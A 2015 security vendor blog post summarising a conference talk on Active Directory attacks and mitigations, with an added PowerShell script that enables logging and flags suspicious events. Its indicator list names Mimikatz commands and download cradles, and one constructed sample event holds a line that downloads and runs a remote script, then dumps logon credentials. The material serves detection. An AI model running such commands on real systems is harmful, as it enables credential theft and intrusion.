Sep 01, 2015 By Jean-Paul Bergeaux In Blog

Insights from Black Hat and DEFCON 2015: Active Directory vulnerabilities pose risks

Although it didn’t make a big news splash, one of the best presentations at both Black Hat and DEFCON provided a comprehensive summary of the known vulnerabilities, configuration weaknesses, and security best practices for enterprises running Microsoft Active Directory.

This was the first presentation at these conferences by Sean Metcalf, who is better known for his Microsoft prowess (which is considerable!). The best way to describe his presentation: Wow, that’s a lot of vulnerabilities!

Discussing everything from how attackers get Domain Admin rights quickly, to well-documented vulnerabilities and weak configurations that are common in most enterprises, Sean laid out just how easy it is for bad actors not only to gain access, but to persist in an environment once they are in.

Starting with the premise that perimeter defenses will not keep APT actors out, Sean explained how attackers use PowerShell, Kerberos Golden and Silver Tickets, service accounts, Mimikatz, and various Active Directory nuances to move freely and stay as long as they like.

It’s important to note that Sean did not cover WMI, except to point out that PowerShell gives direct access to it. So the information he provided needs to be combined with the incredibly important WMI presentation given by the FLARE team. I will be writing more about that soon.

So what do we do with all this information?

Sean offered some detailed mitigations to shore up MS AD environments. Some of the recommendations include:

  • A simple Group Policy configuration change that alerts you to illegitimate access attempts (he called it a GPP HoneyPot, GPP being Group Policy Preferences).
  • Logging all PowerShell activity, with recommendations on what to alert on in the logs.
  • Ways to detect and mitigate attacks on Kerberos ticket-granting tickets (TGTs) and service tickets (TGS), such as Golden and Silver Tickets.
  • Tips for locking down PowerShell without causing administrators problems.
  • Details on the PowerShell security enhancements and how to use them.
  • Three pages of configuration recommendations to help mitigate AD attacks.
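As an added example (this is not code from Sean Metcalf’s talk or from this post), the PowerShell below does two of the things on that list: it turns on script block, module and transcription logging through their Group Policy registry keys, and then runs two simple detections over constructed event records, one over script block text (event 4104) for a short indicator list, and one over Kerberos service-ticket requests (event 4769) for RC4-encrypted tickets to user service accounts, a common sign of Kerberoasting or of a forged ticket. The transcript directory, the indicator list, the field names on the records and the sample events are this example’s own assumptions.

```powershell
# Added example, not from the talk or the post. Registry paths are the documented
# Group Policy backing keys for PowerShell v5 logging (also on v4 with update
# KB3000850 on Windows 8.1 / 2012 R2). Indicators and sample data are assumptions.

# --- 1. Turn on the logging policies (run elevated, on a test box first) ---------
function Enable-PowerShellLogging {
    param([string]$TranscriptDir = 'C:\PSTranscripts')   # assumed path; use a write-only share in production
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

    $sb = Join-Path $base 'ScriptBlockLogging'
    New-Item -Path $sb -Force | Out-Null
    Set-ItemProperty -Path $sb -Name EnableScriptBlockLogging -Value 1 -Type DWord

    $ml = Join-Path $base 'ModuleLogging'
    New-Item -Path (Join-Path $ml 'ModuleNames') -Force | Out-Null
    Set-ItemProperty -Path $ml -Name EnableModuleLogging -Value 1 -Type DWord
    New-ItemProperty -Path (Join-Path $ml 'ModuleNames') -Name '*' -Value '*' -PropertyType String -Force | Out-Null  # every module

    $tr = Join-Path $base 'Transcription'
    New-Item -Path $tr -Force | Out-Null
    Set-ItemProperty -Path $tr -Name EnableTranscripting -Value 1 -Type DWord
    Set-ItemProperty -Path $tr -Name EnableInvocationHeader -Value 1 -Type DWord
    Set-ItemProperty -Path $tr -Name OutputDirectory -Value $TranscriptDir
}

# --- 2. Detections over event records -------------------------------------------
# Assumed indicator list: strings that rarely appear in legitimate admin scripts.
$ScriptBlockIndicators = @(
    'Invoke-Mimikatz', 'sekurlsa::', 'kerberos::golden',       # Mimikatz in any wrapper
    'Invoke-Kerberoast', 'KerberosRequestorSecurityToken',     # TGS harvesting
    'DownloadString', '-EncodedCommand', 'FromBase64String', '-nop -w hidden'
)

# Event 4104 (Microsoft-Windows-PowerShell/Operational): flag script blocks that
# contain any indicator. Records are assumed to carry the text in ScriptBlockText.
function Find-SuspiciousScriptBlock {
    param([Parameter(ValueFromPipeline)] $Event)
    process {
        if ($Event.Id -ne 4104) { return }
        $hits = $ScriptBlockIndicators | Where-Object { $Event.ScriptBlockText -match [regex]::Escape($_) }
        if ($hits) {
            [pscustomobject]@{ Time = $Event.TimeCreated; Host = $Event.MachineName
                               User = $Event.UserId;      Indicators = ($hits -join ',') }
        }
    }
}

# Event 4769 (DC Security log): a service ticket for a user account (not a
# computer$ account, not krbtgt) requested with RC4-HMAC (0x17). With AES in use
# domain-wide this is what Kerberoasting looks like; Mimikatz-forged tickets
# default to RC4 as well, so the same filter is a Golden/Silver Ticket hint.
function Find-Rc4ServiceTicket {
    param([Parameter(ValueFromPipeline)] $Event)
    process {
        if ($Event.Id -ne 4769) { return }
        if ($Event.TicketEncryptionType -ne '0x17') { return }
        if ($Event.ServiceName -like '*$' -or $Event.ServiceName -eq 'krbtgt') { return }
        [pscustomobject]@{ Time = $Event.TimeCreated; Requester = $Event.AccountName
                           Service = $Event.ServiceName; From = $Event.ClientAddress }
    }
}

# --- 3. Constructed sample records (not real log data) ---------------------------
$sample = @(
    [pscustomobject]@{ Id = 4104; TimeCreated = '2015-08-10 09:12:03'; MachineName = 'WS042'; UserId = 'CORP\jdoe'
                       ScriptBlockText = 'Get-ChildItem C:\Temp' },
    [pscustomobject]@{ Id = 4104; TimeCreated = '2015-08-10 09:15:41'; MachineName = 'WS042'; UserId = 'CORP\jdoe'
                       ScriptBlockText = 'IEX (New-Object Net.WebClient).DownloadString("http://10.0.0.5/im.ps1"); Invoke-Mimikatz -Command "sekurlsa::logonpasswords"' },
    [pscustomobject]@{ Id = 4769; TimeCreated = '2015-08-10 09:16:02'; AccountName = 'jdoe@CORP.LOCAL'
                       ServiceName = 'WS042$'; TicketEncryptionType = '0x12'; ClientAddress = '10.0.5.42' },
    [pscustomobject]@{ Id = 4769; TimeCreated = '2015-08-10 09:16:09'; AccountName = 'jdoe@CORP.LOCAL'
                       ServiceName = 'svc_sql'; TicketEncryptionType = '0x17'; ClientAddress = '10.0.5.42' }
)

$sample | Find-SuspiciousScriptBlock | Format-Table -AutoSize
$sample | Find-Rc4ServiceTicket      | Format-Table -AutoSize
```

Only the two detection functions run against the constructed records; Enable-PowerShellLogging is defined but not called, since it changes machine policy. Against live data you would feed Get-WinEvent output instead, mapping the script text of a 4104 event and the ticket fields of a 4769 event (both sit in the event’s Properties / message XML) onto the field names the functions expect. Exclude known RC4-only legacy accounts from the 4769 rule before alerting on it, or it will page you for every old appliance in the domain.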

Sean’s presentation, which provides extensive details and additional recommendations, can be found on both the Black Hat and DEFCON websites.

Agencies should review these recommendations and make sure they are implemented. Some of the recommendations will meet resistance because of the changes admins will have to make to their routine, but recent incidents clearly demonstrate that security is more important than convenience. For assistance in hardening your environment with these mitigations, you can contact SwishData to scope an engagement with our Security Services group.

Stay tuned for more security updates from Black Hat and DEFCON.